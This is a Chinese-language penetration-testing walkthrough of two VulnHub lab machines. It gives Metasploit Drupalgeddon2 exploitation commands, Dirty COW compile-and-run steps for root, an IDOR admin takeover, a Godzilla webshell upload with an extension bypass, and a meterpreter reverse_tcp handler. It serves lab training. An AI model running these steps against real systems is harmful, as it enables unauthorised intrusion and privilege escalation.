run post/multi/recon/local_exploit_suggester

https://github.com/diego-treitos/linux-smart-enumeration

我們把.sh文件上傳到/usr/share 下

然后我們掃描一下我們的靶機

https://www.vulnhub.com/entry/lampiao-1,249/
靶機下載地址

信息收集掃描ip掃描

訪問80端口發現沒有信息訪問1898

看到這個外星人圖標就知道是內網滲透中經常出現的Drupal

這個最常見的利用就是框架漏洞

發現是低版本的php搭建的 所以直接進行利用

這里我直接使用第二個exp

使用use進行調用

查看利用的配置??

檢查一下payload

設置上? rhost和rport

?

報這個標頭就是進入了 后滲透模式? 就是我們已經控制了對方的主機

查看用戶權限

找好定位我們現在是在web權限上

輸入shell獲取對方的命令行

查看id是1000內的所以我們的目標是拿取root權限

需要使用漏洞 先上傳檢測文件

報了小臟牛漏洞? 直接去github上找 nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ?? Be careful Malware.

利用的exp

exp上傳 ?

上傳之后把exp.c進行編譯

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

python -c 'import pty; pty.spawn("/bin/bash")'

復現環境：https://www.vulnhub.com/entry/lampiao-1,249/
1、信息收集：
nmap -p1-65535 192.168.139.0/24
2、Web漏洞利用：
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.46.144
set rport 1898
run
3、內核提權：
upload /root/linux-exploit-suggester.sh /tmp/1.sh
shell
cd /tmp
chmod +x 1.sh
./1.sh
https://github.com/gbonacini/CVE-2016-5195
upload /root/dcow.cpp /tmp/dcow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
su root

案例二? pwnkit??

靶機下載https://www.vulnhub.com/entry/darkhole-1,724/

sudo arp-scan -l

先掃描內網的ip

開放了80?

這個漏洞是前端的一個邏輯越權漏洞 先注冊一個賬號

賬號修改里出現這個id可能就是 代表的賬戶?

我們試一下改為1會不會直接修改admin的賬號和密碼

哥斯拉生成后門?使用繞過形式 改為 .phtml 進行繞過

后門上傳成功

后門地點

http://192.168.248.136/upload/xxx.phtml

學個新操做? ?哥斯拉聯動msf（在不使用msfvemon生成反彈shell的情況下）

命令：

71  use /exploits/multi/handler
72  ip a
73  set payload php/meterpreter/reverse_tcp
74  set lport 5566
75  history

先加載再go

接受到了shell? ?然后進行提權

上傳檢測腳本

這個就是我們要學的新漏洞

第一個方法就是使用本地漏掃工具